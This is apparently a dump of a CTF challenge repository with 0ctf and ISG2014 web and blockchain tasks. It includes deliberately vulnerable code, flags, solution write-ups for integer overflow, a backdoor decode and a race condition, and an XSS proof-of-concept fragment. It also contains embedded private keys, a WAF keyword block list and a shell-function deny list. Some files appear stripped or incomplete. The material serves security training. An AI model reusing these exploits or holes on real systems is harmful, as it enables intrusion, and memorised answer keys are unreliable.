├── .gitignore ├── 0ctf2017-qual ├── simplesqlin_100 │ ├── waf │ │ ├── init.lua │ │ └── waf.lua │ ├── install.sql │ └── nginx.conf ├── simplexss │ ├── preview.php │ ├── flag.php │ ├── function.php │ ├── run.py │ ├── run.php │ ├── readme.txt │ ├── index.php │ └── static │ │ └── bootstrap.min.js └── complicatedxss_500 │ ├── poc │ ├── 1.js │ └── 2.js │ ├── main │ ├── run.php │ ├── index.php │ └── static │ │ ├── i_dont_believe_you_can_guess_this_js.js.php │ │ └── bootstrap.min.js │ ├── run.js │ └── admin.py ├── 0ctf2018-final └── zerolottery │ ├── base_chain │ ├── data │ │ ├── geth │ │ │ ├── LOCK │ │ │ ├── chaindata │ │ │ │ ├── LOCK │ │ │ │ ├── CURRENT │ │ │ │ ├── 000006.log │ │ │ │ ├── 000008.ldb │ │ │ │ ├── MANIFEST-000007 │ │ │ │ └── LOG │ │ │ ├── lightchaindata │ │ │ │ ├── LOCK │ │ │ │ ├── CURRENT │ │ │ │ ├── 000001.log │ │ │ │ ├── MANIFEST-000000 │ │ │ │ └── LOG │ │ │ ├── transactions.rlp │ │ │ └── nodekey │ │ └── keystore │ │ │ ├── UTC--2018-05-10T08-41-28.597885436Z--af98ff0461a8f7adf7021463715d0b75d83ed519 │ │ │ └── UTC--2018-05-10T08-42-44.098066136Z--ac9e27b1fabd55d3e85104d9feb945c57d99f43a │ ├── init.sh │ ├── nginx.conf │ ├── kill.sh │ ├── genesis.json │ ├── run.sh │ ├── automine.js │ └── flag.py │ ├── zerolottery.pptx │ ├── genesis.json │ ├── readme.md │ └── zerolottery.sol ├── ISG2014 ├── shop │ ├── fl11l444444ggg.txt │ ├── index.php │ └── ReadMe.txt ├── findshell │ ├── findshell │ │ ├── tthisiiisttheflllaaag.txt │ │ └── index.php │ └── Readme.txt ├── ReadMe.txt ├── safesite │ ├── Readme.txt │ ├── admin │ │ ├── config.php │ │ ├── index.php │ │ ├── login.php │ │ └── conn.php │ ├── main │ │ ├── static │ │ │ ├── theme.css │ │ │ └── bootstrap-theme.min.css │ │ └── index.php │ └── install.sql └── X-Area │ ├── Readme.txt │ └── index.php ├── 0ctf2016-final ├── checker │ ├── secretagent.py │ ├── secretagent.pyc │ ├── public.pem │ ├── private.pem │ ├── rsa_ussage.py │ ├── rsa_flag.py │ ├── exp.py │ ├── README.md │ ├── 5alt_admin.py │ ├── reset_pwd.py │ ├── 
check_upload.py │ └── check_post.py ├── install.txt ├── z0ne.zip ├── 漏洞列表.txt └── z0ne.sh ├── 0ctf2016-qual ├── web500_xss │ ├── web500.zip │ ├── other_data.zip │ └── readme.md └── web200_Monkey │ ├── web200.zip │ ├── other_data.zip │ └── ReadMe.md ├── 0ctf2017-final └── uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip └── 0ctf2018-qual └── easy_ums ├── README.md ├── static ├── sticky-footer.css └── signin.css ├── config.php ├── index.php ├── verify.php ├── login.php ├── change.php ├── register.php └── common.php /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/waf/init.lua: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/LOCK: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/transactions.rlp: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ISG2014/shop/fl11l444444ggg.txt: -------------------------------------------------------------------------------- 1 | ISG{Th3_sH0p_Is_C4l1inG_Th3_p0lic3_n0W!} 
-------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/CURRENT: -------------------------------------------------------------------------------- 1 | MANIFEST-000007 2 | -------------------------------------------------------------------------------- /ISG2014/findshell/findshell/tthisiiisttheflllaaag.txt: -------------------------------------------------------------------------------- 1 | ISG{u_sUcCEssFuLlY_F1nd_YOuR_sHe11} -------------------------------------------------------------------------------- /0ctf2016-final/checker/secretagent.py: -------------------------------------------------------------------------------- 1 | def flag(service, teamid): 2 | return '0ctf{hello}' -------------------------------------------------------------------------------- /0ctf2016-final/install.txt: -------------------------------------------------------------------------------- 1 | ubuntu 14.04 2 | 3 | 把z0ne.sh和z0ne.zip放/root目录下,以root身份执行z0ne.sh -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/CURRENT: -------------------------------------------------------------------------------- 1 | MANIFEST-000000 2 | -------------------------------------------------------------------------------- /ISG2014/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/ReadMe.txt -------------------------------------------------------------------------------- /0ctf2016-final/z0ne.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-final/z0ne.zip -------------------------------------------------------------------------------- /ISG2014/shop/index.php: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/shop/index.php -------------------------------------------------------------------------------- /ISG2014/findshell/Readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/findshell/Readme.txt -------------------------------------------------------------------------------- /ISG2014/safesite/Readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/ISG2014/safesite/Readme.txt -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/nodekey: -------------------------------------------------------------------------------- 1 | 6a1c7b73e08d35a358570043ab6af1edc6c4b1df8cf84b3c470d77fa4e52170f -------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/web500.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web500_xss/web500.zip -------------------------------------------------------------------------------- /0ctf2016-final/checker/secretagent.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-final/checker/secretagent.pyc -------------------------------------------------------------------------------- /0ctf2016-qual/web200_Monkey/web200.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web200_Monkey/web200.zip 
-------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/other_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web500_xss/other_data.zip -------------------------------------------------------------------------------- /0ctf2016-qual/web200_Monkey/other_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2016-qual/web200_Monkey/other_data.zip -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/zerolottery.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/zerolottery.pptx -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/preview.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /0ctf2017-final/uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2017-final/uglyweb_3ad9c2c3ecc09bc9945492d64f3ea667.zip -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000006.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000006.log -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000008.ldb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/000008.ldb -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/MANIFEST-000007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/chaindata/MANIFEST-000007 -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/000001.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/000001.log -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/MANIFEST-000000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/5alt/ctf-challenges/master/0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/MANIFEST-000000 -------------------------------------------------------------------------------- /ISG2014/safesite/admin/config.php: -------------------------------------------------------------------------------- 1 | p > .btn { 13 | margin: 5px 0; 14 | } 15 | 16 | .theme-showcase .navbar .container { 17 | width: auto; 18 | } 19 | -------------------------------------------------------------------------------- /ISG2014/shop/ReadMe.txt: -------------------------------------------------------------------------------- 1 | [题目名称] 2 | shop 3 | [题目描述] 4 | 我只有一块钱,但我想买好多好多东西 5 | [作者] 6 | md5_salt 7 | [建议分值] 8 | 200 9 | 10 | [出题意图] 11 | 主要考察php在处理订单时可能会产生的整数溢出问题。 12 | 13 | 
[题目分析] 14 | 由于在php的整数里,int(4294967297) === 1 15 | 因此只要利用价格凑出总价为4294967297的订单即可。 16 | MX4 1999 * 5 17 | iPhone5s 64G: 6990 * 1 18 | iPhone5s 32G: 6088 * 1 19 | Macbook Pro Retina 15': 14288 * 300598 20 | -------------------------------------------------------------------------------- /ISG2014/X-Area/Readme.txt: -------------------------------------------------------------------------------- 1 | [题目名称] 2 | X-Area 3 | [题目描述] 4 | 限制区域,非请勿入! 5 | [作者] 6 | md5_salt 7 | [建议分值] 8 | 300 9 | 10 | [出题意图] 11 | 在代码审计中经常会遇到一些代码保护措施,有时候黑客留下的后门也经常以加密的形式存在。 12 | 此题主要考察对加密后php源码文件的解密能力。 13 | 14 | [题目分析] 15 | 首先需要通过Http基础认证,可以从最近泄露的GMail数据库中查到密码。 16 | 接下来可以查看源码得到经过base64加密后的php代码。将eval替换成echo,并按照加密的逻辑解密之后便可以得到写在注释里的flag。 17 | 18 | [题目答案] 19 | ISG{tHe_MaGic_pHP_S0UrCE_c0D3} 20 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/geth/lightchaindata/LOG: -------------------------------------------------------------------------------- 1 | =============== May 10, 2018 (CST) =============== 2 | 16:10:44.591777 log@legend F·NumFile S·FileSize N·Entry C·BadEntry B·BadBlock Ke·KeyError D·DroppedEntry L·Level Q·SeqNum T·TimeElapsed 3 | 16:10:44.592457 db@open opening 4 | 16:10:44.593485 version@stat F·[] S·0B[] Sc·[] 5 | 16:10:44.593759 db@janitor F·2 G·0 6 | 16:10:44.593778 db@open done T·1.309951ms 7 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/nginx.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | access_log /var/log/nginx/access.log; 5 | 6 | location / { 7 | proxy_read_timeout 300; 8 | proxy_connect_timeout 300; 9 | 10 | if ($remote_addr ~* '192.168.1(\d{2}).\d{1,3}') { 11 | proxy_pass http://127.0.0.1:80$1; 12 | break; 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- 
/0ctf2017-qual/simplexss/function.php: -------------------------------------------------------------------------------- 1 | /;&#,.:[]{}?%@!$'); 5 | return str_replace($bad, '', $str); 6 | } 7 | 8 | function add_html($str){ 9 | $t = << 11 | 12 | 13 | XSS Test Page 14 | 15 | 16 |

17 | %s 18 |

19 | 20 | EOF; 21 | return sprintf($t, $str); 22 | } 23 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/kill.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | kill_session(){ 3 | cmd=$(which tmux) 4 | session="data$1" 5 | 6 | run_session="run_$session" 7 | mine_session="mine_$session" 8 | 9 | $cmd kill-session -t $run_session 10 | $cmd kill-session -t $mine_session 11 | } 12 | 13 | 14 | for ((i=1; i<=12; i++)); do 15 | kill_session $i 16 | done 17 | 18 | for ((i=21; i<=35; i++)); do 19 | kill_session $i 20 | done -------------------------------------------------------------------------------- /ISG2014/safesite/install.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `isg_admin` ( 2 | `uid` int(10) unsigned NOT NULL auto_increment, 3 | `username` varchar(32) default NULL, 4 | `password` varchar(64) default NULL, 5 | `info` varchar(200) default NULL, 6 | PRIMARY KEY (`uid`) 7 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 8 | 9 | INSERT INTO `isg_admin`(`username`, `password`, `info`) VALUES('admin', '86c969bebab9cfeb47efcc65d85f26c5', 'login and capture the flag!'); -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/waf/waf.lua: -------------------------------------------------------------------------------- 1 | function say_html() 2 | html=[[ 3 | Your request is blocked by waf. 
4 | ]] 5 | ngx.header.content_type = "text/html" 6 | ngx.status = ngx.HTTP_FORBIDDEN 7 | ngx.say(html) 8 | ngx.exit(ngx.status) 9 | end 10 | 11 | function url() 12 | rule = "(select|where|from|delete|update|insert|sleep|benchmark)" 13 | if rule ~="" and ngx.re.match(ngx.unescape_uri(ngx.var.request_uri),rule,"isjo") then 14 | say_html() 15 | return true 16 | end 17 | 18 | return false 19 | end 20 | url() 21 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/poc/1.js: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/keystore/UTC--2018-05-10T08-41-28.597885436Z--af98ff0461a8f7adf7021463715d0b75d83ed519: -------------------------------------------------------------------------------- 1 | {"address":"af98ff0461a8f7adf7021463715d0b75d83ed519","crypto":{"cipher":"aes-128-ctr","ciphertext":"a6f784d01f0a2732ca862278561513ad7dcf3ba1592bb325b7f6fe4394b38174","cipherparams":{"iv":"f9ed34a4f42eae1959cf02ac14e1c144"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"88ca4a87bd130d9e381d3f30ffec58edce1a4007bf91bc5091530d0e57944311"},"mac":"864afd70f635d99ab3580cbfa51e8624a9b501d2fc8796a22f41141826106193"},"id":"cc408e2d-0761-44f1-b389-443c5a5d2304","version":3} -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/data/keystore/UTC--2018-05-10T08-42-44.098066136Z--ac9e27b1fabd55d3e85104d9feb945c57d99f43a: -------------------------------------------------------------------------------- 1 | 
{"address":"ac9e27b1fabd55d3e85104d9feb945c57d99f43a","crypto":{"cipher":"aes-128-ctr","ciphertext":"124439d211e1f150263b72a39e3315854771e76692d21e1f3250526d378464e1","cipherparams":{"iv":"aeb9dc2b9d7caf69266335601da59bf1"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"760ee818dca12b20efaaa32e222c5dab86e54fc8ce7d108c4e2a97a82d126024"},"mac":"e5a648f5c4574080551fad6e7b2194c118a2960e0d55afbf88a0a404fb21eb42"},"id":"99e3f212-1fb7-4747-8c66-ee82447c633c","version":3} -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/README.md: -------------------------------------------------------------------------------- 1 | # Easy User Manage System 2 | 3 | ## exploit 4 | Register a user, then log in from two separate browsers. In the first browser, change the phone to your VPS, get the code, put it into the verify page and wait. In the second browser, input 8.8.8.8 in the change phone page. Click change phone's submit and then quickly submit the verify code in the first browser; you will get the flag. 5 | 6 | ## explanation 7 | Values in session and database are not always the same, so a check passed against one can be stale by the time the other is updated. 8 | 9 | Actually there should have been a hint, but the challenge was solved by one team within an hour, so it would have been unfair to release any hints after that. 
10 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 1337, 4 | "homesteadBlock": 0, 5 | "eip155Block": 0, 6 | "eip158Block": 0 7 | }, 8 | "alloc" : { 9 | "0x0000000000000000000000000000000000000001": {"balance": "0"} 10 | }, 11 | "coinbase" : "0x0000000000000000000000000000000000000000", 12 | "difficulty" : "0x0", 13 | "extraData" : "", 14 | "gasLimit" : "0x2fefd8", 15 | "nonce" : "0x00000000deadbeef", 16 | "mixhash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 17 | "parentHash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 18 | "timestamp" : "0x00" 19 | } -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/genesis.json: -------------------------------------------------------------------------------- 1 | { 2 | "config": { 3 | "chainId": 1337, 4 | "homesteadBlock": 0, 5 | "eip155Block": 0, 6 | "eip158Block": 0 7 | }, 8 | "alloc" : { 9 | "0x0000000000000000000000000000000000000001": {"balance": "0"} 10 | }, 11 | "coinbase" : "0x0000000000000000000000000000000000000000", 12 | "difficulty" : "0x0", 13 | "extraData" : "", 14 | "gasLimit" : "0x2fefd8", 15 | "nonce" : "0x00000000deadbeef", 16 | "mixhash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 17 | "parentHash" : "0x0000000000000000000000000000000000000000000000000000000000000000", 18 | "timestamp" : "0x00" 19 | } -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/install.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE `news` ( 2 | `id` int(11) NOT NULL AUTO_INCREMENT, 3 | `title` varchar(255) COLLATE utf8_bin NOT NULL, 4 | `content` TEXT COLLATE utf8_bin NOT NULL, 5 | 
PRIMARY KEY (`id`) 6 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 7 | 8 | CREATE TABLE `flag` ( 9 | `flag` varchar(255) COLLATE utf8_bin NOT NULL, 10 | PRIMARY KEY (`flag`) 11 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 12 | 13 | INSERT INTO `flag` VALUES('flag{W4f_bY_paSS_f0R_CI}'); 14 | 15 | INSERT INTO `news`(`title`, `content`) VALUES('Hello World', 'Hello guys, flag is in the database'), 16 | ('Waf', 'wtf, the waf blocks some keywords'), 17 | ('Sqlin', 'you should solve this game by sqlin'), 18 | ('darkness', 'hello darkness my old friend'); -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/static/sticky-footer.css: -------------------------------------------------------------------------------- 1 | /* Sticky footer styles 2 | -------------------------------------------------- */ 3 | html { 4 | position: relative; 5 | min-height: 100%; 6 | } 7 | body { 8 | margin-bottom: 60px; /* Margin bottom by footer height */ 9 | } 10 | .footer { 11 | position: absolute; 12 | bottom: 0; 13 | width: 100%; 14 | height: 60px; /* Set the fixed height of the footer here */ 15 | line-height: 60px; /* Vertically center the text there */ 16 | background-color: #f5f5f5; 17 | } 18 | 19 | 20 | /* Custom page CSS 21 | -------------------------------------------------- */ 22 | /* Not required for template or sticky footer method. */ 23 | 24 | .container { 25 | width: auto; 26 | max-width: 680px; 27 | padding: 0 15px; 28 | } 29 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/config.php: -------------------------------------------------------------------------------- 1 | 20 | 21 | 22 | 23 | 后台管理 24 | 25 | 26 |

管理登录

27 |
28 | 用户名:
29 | 密码:
30 | 31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/private.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICYQIBAAKBgQCYtMrW3WSwvKYA/w0H0zECtY+CWZYLoL2BgnHaqKJOAoxfIDfB 3 | XVHB8Ie7v8vhjfQbpeTgJEy48YdAWVinGaR8VOaT+rPNOCvrEFnMvyYdscormA2a 4 | sJZBpT5xJAIM3JuByErkhv2zKcFG/bNqwKLLVXVHPpnneuGxUC9T0Vdl3QIDAQAB 5 | AoGAOd6pz+tusRuMvWvqgECkniY4EGnq1tU/e8j3ZKnreCy3DYWkG39F8H06swfo 6 | N74X+DJSHi8jdCLz4or5LnoE8WSQQs5qGsPQBikTk7zQzPshRqUKRUVPYZMsAoGs 7 | 1Fbkw7PpQh15hLLpISMcbyQpMCUz9wGIsTproXe2g6LOX4ECRQCxdQ50PCU2r17F 8 | xAHeecT7ThSzBSksy/co1FTfEtv11NeFjjObDtjlLCx10a8CldFdT9iK3P7vfg9x 9 | X7pzsKtv0v+aBQI9ANxLTKL/wRJwYY9Q5++vnF/kxiYvNqv6cleyRXKNnk5FYI1a 10 | E8ZcheyAd6wRZuWfJdjk++RImOCVWnjr+QJECK+6LWZkS/D5qqSVktZTFhoUWU7/ 11 | XPn+9zitjt3VdoscoaT8UbLAWzd2Va4V6wJ6ZR7rcqCuufpptxsAfXlAaxDhAiEC 12 | PQCVrNO1K/AShyjCJ0ZvI/IrdVTsPMf4sYFe9FEbM/2LULf5Ump9LAASYHbvAiPX 13 | f/pHE83RnUHB1bhS0IECRQCwQLBaf5RVVdNf6iKt4Gxhq3+P7+/QRj5p5/d1gfF+ 14 | crPay+CMPcCRV0myxNwKQI3i+z8zJNVtWA0gJwn8Tm6nMfTg4g== 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | start_game(){ 3 | cmd=$(which tmux) 4 | session="data$1" 5 | let "rpcport=8000+$1" 6 | let "p2pport=3000+$1" 7 | run_session="run_$session" 8 | mine_session="mine_$session" 9 | 10 | $cmd has-session -t $run_session > /dev/null 11 | 12 | if [ $? 
!= 0 ]; then 13 | $cmd new-session -s $run_session -d 14 | $cmd send-keys -t $run_session "HOME=team_data/$session geth --datadir team_data/$session --networkid 1337 --rpc --rpcaddr 127.0.0.1 --rpcport $rpcport --rpcapi='eth,personal' --nodiscover --port $p2pport" C-m 15 | $cmd new-session -s $mine_session -d 16 | $cmd send-keys -t $mine_session "sleep 5; HOME=team_data/$session geth --preload ./automine.js attach $(pwd)/team_data/$session/geth.ipc console" C-m 17 | fi 18 | } 19 | 20 | for ((i=1; i<=12; i++)); do 21 | start_game $i 22 | done 23 | 24 | for ((i=21; i<=35; i++)); do 25 | start_game $i 26 | done 27 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/automine.js: -------------------------------------------------------------------------------- 1 | var minimum_confirmations = 12; 2 | var mining_threads = 10 3 | var txBlock = 0 4 | function checkWork() { 5 | if (eth.getBlock("pending").transactions.length > 0) { 6 | txBlock = eth.getBlock("pending").number 7 | if (eth.mining) return; 8 | console.log(" Transactions pending. 
Mining..."); 9 | miner.start(mining_threads) 10 | interval = setInterval(function () { 11 | if (eth.getBlock("latest").number < txBlock + minimum_confirmations) { 12 | if (eth.getBlock("pending").transactions.length > 0) txBlock = eth.getBlock("pending").number; 13 | } else { 14 | console.log(minimum_confirmations + " confirmations achieved; mining stopped."); 15 | miner.stop() 16 | clearInterval(interval); 17 | } 18 | }, 600) 19 | } 20 | } 21 | 22 | eth.filter("latest", function (err, block) { checkWork(); }); 23 | eth.filter("pending", function (err, block) { checkWork(); }); 24 | 25 | checkWork(); -------------------------------------------------------------------------------- /0ctf2016-final/checker/rsa_ussage.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | __author__ = 'luchanghong' 3 | import rsa 4 | 5 | #http://www.aikaiyuan.com/5204.html 6 | ''' 7 | # 先生成一对密钥,然后保存.pem格式文件,当然也可以直接使用 8 | (pubkey, privkey) = rsa.newkeys(1024) 9 | 10 | pub = pubkey.save_pkcs1() 11 | pubfile = open('public.pem','w+') 12 | pubfile.write(pub) 13 | pubfile.close() 14 | 15 | pri = privkey.save_pkcs1() 16 | prifile = open('private.pem','w+') 17 | prifile.write(pri) 18 | prifile.close() 19 | ''' 20 | # load公钥和密钥 21 | message = 'hello' 22 | with open('public.pem') as publickfile: 23 | p = publickfile.read() 24 | pubkey = rsa.PublicKey.load_pkcs1(p) 25 | 26 | with open('private.pem') as privatefile: 27 | p = privatefile.read() 28 | privkey = rsa.PrivateKey.load_pkcs1(p) 29 | 30 | # 用公钥加密、再用私钥解密 31 | crypto = rsa.encrypt(message, pubkey) 32 | print crypto.encode('hex') 33 | message = rsa.decrypt(crypto, privkey) 34 | print message 35 | 36 | # sign 用私钥签名认真、再用公钥验证签名 37 | signature = rsa.sign(message, privkey, 'SHA-1') 38 | print signature.encode('hex') 39 | print rsa.verify('hello', signature, pubkey) 40 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/index.php: 
-------------------------------------------------------------------------------- 1 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | hello 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 |

Hello

30 |

You can change your phone here.

31 |

If you make your phone to be 8.8.8.8, I will give you a flag.

32 | ".$flag."

"; 35 | } ?> 36 |
37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /0ctf2016-qual/web500_xss/readme.md: -------------------------------------------------------------------------------- 1 | apt-get install nginx 2 | apt-get install mysql-server 3 | apt-get install redis-server 4 | apt-get install php5 5 | apt-get install php5-fpm 6 | apt-get install php5-curl 7 | apt-get install php5-mysql 8 | apt-get install php5-redis 9 | apt-get install mailutils 10 | 11 | 12 | 13 | apt-get install unzip 14 | apt-get install phantomjs 15 | apt-get install python-pip 16 | apt-get install python-dev libmysqlclient-dev 17 | pip install MySQL-python 18 | 19 | 20 | /etc/php5/fpm/php.ini 21 | 22 | disable_functions 23 | passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server 24 | 25 | open_basedir /usr/share/nginx/html:/tmp/:/proc/ 26 | 27 | session.save_handler = redis 28 | session.save_path = "tcp://127.0.0.1:6379" 29 | 30 | 31 | /etc/nginx/sites-enabled/default 32 | 33 | service php5-fpm restart 34 | 35 | 36 | cd /usr/share/nginx/html 37 | chown -R root:www-data * 38 | chmod -R 650 * 39 | chmod 777 uploads 40 | 41 | 42 | 设置iptables允许服务器访问外面的脚本! 
-------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/poc/2.js: -------------------------------------------------------------------------------- 1 | function ss(){ 2 | var aaa = document.getElementById('aaa') 3 | Function = aaa.contentWindow.Function;XMLHttpRequest = aaa.contentWindow.XMLHttpRequest;Image = aaa.contentWindow.Image;alert = aaa.contentWindow.alert; 4 | XMLHttpRequest.prototype.sendAsBinary||(XMLHttpRequest.prototype.sendAsBinary=function(a){for(var d=a.length,c=new Uint8Array(d),b=0;b /dev/null &"); 17 | } 18 | } 19 | //check task first 20 | if(!$_SESSION['task']) die('please get your work!'); 21 | if(substr(md5($_POST['task']), 0, 6) !== $_SESSION['task']) die('prove your work first!'); 22 | $_SESSION['task'] = genTasks(); 23 | $payload = $_POST['payload']; 24 | 25 | $filename = 'data/'.bin2hex(file_get_contents('/dev/urandom', NULL, NULL, 0, 16)).".html"; 26 | file_put_contents($filename, $payload); 27 | 28 | $url = 'http://government.vip/'.$filename; 29 | 30 | execInBackground($phantomjs.' '.$run.' 
'.$url); 31 | 32 | echo "processing..."; 33 | 34 | ?> 35 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/static/signin.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | height: 100%; 4 | } 5 | 6 | body { 7 | display: -ms-flexbox; 8 | display: -webkit-box; 9 | display: flex; 10 | -ms-flex-align: center; 11 | -ms-flex-pack: center; 12 | -webkit-box-align: center; 13 | align-items: center; 14 | -webkit-box-pack: center; 15 | justify-content: center; 16 | padding-top: 40px; 17 | padding-bottom: 40px; 18 | background-color: #f5f5f5; 19 | } 20 | 21 | .form-signin { 22 | width: 100%; 23 | max-width: 330px; 24 | padding: 15px; 25 | margin: 0 auto; 26 | } 27 | .form-signin .checkbox { 28 | font-weight: 400; 29 | } 30 | .form-signin .form-control { 31 | position: relative; 32 | box-sizing: border-box; 33 | height: auto; 34 | padding: 10px; 35 | font-size: 16px; 36 | } 37 | .form-signin .form-control:focus { 38 | z-index: 2; 39 | } 40 | .form-signin input[type="email"] { 41 | margin-bottom: -1px; 42 | border-bottom-right-radius: 0; 43 | border-bottom-left-radius: 0; 44 | } 45 | .form-signin input[type="password"] { 46 | margin-bottom: 10px; 47 | border-top-left-radius: 0; 48 | border-top-right-radius: 0; 49 | } 50 | -------------------------------------------------------------------------------- /ISG2014/findshell/findshell/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 |
8 | File: 9 | 10 |
11 |
12 | 13 | 0) 17 | { 18 | die("Return Code: " . $_FILES["file"]["error"] . "
